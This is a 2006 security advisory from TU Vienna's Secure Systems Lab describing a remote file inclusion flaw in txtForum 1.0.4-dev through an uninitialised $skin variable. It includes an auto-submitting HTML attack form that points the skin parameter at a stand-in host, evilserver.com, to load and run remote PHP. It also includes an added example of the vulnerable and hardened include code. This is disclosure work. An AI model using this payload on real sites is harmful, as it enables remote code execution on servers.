txtForum: Script Injection Vulnerability

2006-03-09T00:00:00
ID SECURITYVULNS:DOC:11768
Type securityvulns
Reporter Securityvulns
Modified 2006-03-09T00:00:00

Description

===========================================================
txtForum: Script Injection Vulnerability
===========================================================
Technical University of Vienna Security Advisory TUVSA-0603-004, March 9, 2006
===========================================================

Affected applications

txtForum (http://sourceforge.net/projects/txtforum1)

Versions 1.0.4-dev and prior.

Description

There is an include statement in the file common.php on line 46 that makes use of the SKIN constant, which was previously defined via the $skin variable. Under the following conditions, an attacker can inject arbitrary PHP script into the application:

  • register_globals has to be active
  • remote file inclusions have to be allowed

All the attacker has to do is find a path through the program that doesn't initialize the $skin variable. The attacker does not require access to an account in the forum. Here is an example of an attack page:

<form action='http://localhost/txtforum104/login.php' method="post">
<input type="text" name="login_username" value="admin"/>
<input type="text" name="login_password" value="xyz"/>
<input type="text" name="skin" value="http://evilserver.com"/>
<input type="submit">
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>

This leads to execution of the code in http://evilserver.com/header.tpl. There might be further possibilities for exploits (similar include statements can also be found on lines 53 and 61).
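As an added illustration (this is not code from the advisory or from the txtForum project), the following PHP reconstructs the include pattern described above in minimal form and places a hardened version beside it. The function names, the skins directory layout, the allowlist entries and the use of a session value are assumptions made for the example; only $skin, SKIN and header.tpl come from the advisory.

```php
<?php
// Added example, not txtForum's code. Names other than $skin, SKIN and
// header.tpl are assumptions chosen for illustration.

// --- Vulnerable pattern, as the advisory describes it ----------------------
// With register_globals=On a request parameter "skin" becomes $skin. If the
// code path that reaches this point never assigns $skin, the request value
// ends up in the constant and, with remote includes enabled, in include().
function vulnerable_header()
{
    global $skin;                  // possibly never initialised on this path
    define('SKIN', $skin);
    include SKIN . '/header.tpl';  // include path derived from request data
}

// --- Hardened pattern --------------------------------------------------------
// 1. Initialise the skin name explicitly instead of relying on register_globals.
// 2. Accept only names from a fixed allowlist, so no URL or path fragment can
//    reach include().
// 3. Build the path from a constant base directory and confirm the resolved
//    directory still lies inside it (defence in depth against "..").
define('SKIN_BASE', __DIR__ . '/skins');     // assumed layout
$ALLOWED_SKINS = array('default', 'dark');    // assumed skin names

function resolve_skin_dir($requested, array $allowed)
{
    // Explicit default: $requested is null when nothing was supplied.
    $name = is_string($requested) ? $requested : 'default';

    // Strict allowlist comparison; unknown values fall back to the default.
    if (!in_array($name, $allowed, true)) {
        $name = 'default';
    }

    $base = realpath(SKIN_BASE);
    $dir  = realpath(SKIN_BASE . '/' . $name);
    // realpath() returns false for missing directories and collapses "..";
    // require the result to be a child of the skins directory.
    if ($base === false || $dir === false
        || strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $dir;
}

function hardened_header($requested_skin, array $allowed)
{
    $dir = resolve_skin_dir($requested_skin, $allowed);
    if ($dir === false) {
        // Fail closed rather than include an unexpected file.
        http_response_code(500);
        exit('skin unavailable');
    }
    include $dir . '/header.tpl';
}

// Usage (assumed): take the skin name from the user's stored preference,
// never straight from the request.
// $requested = isset($_SESSION['skin']) ? $_SESSION['skin'] : null;
// hardened_header($requested, $ALLOWED_SKINS);

// Configuration hardening in php.ini, independent of the code change:
//   register_globals  = Off   ; request parameters no longer become variables
//   allow_url_include = Off   ; include()/require() refuse http:// and similar URLs
```

The allowlist is what removes the vulnerability class: once the include path can only be one of a few constant strings, neither register_globals nor the remote-include setting matters for this statement. The realpath containment check and the php.ini settings are additional layers so that a future code path that forgets the allowlist still cannot pull in a remote file.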

Solution

There is no solution to this issue yet.

Timeline:

March 2, 2006: Vulnerability reported to and acknowledged by the developer (I.Konforti). A fix is not planned.

March 9, 2006: Advisory submission.

References

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0603-004.txt

Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at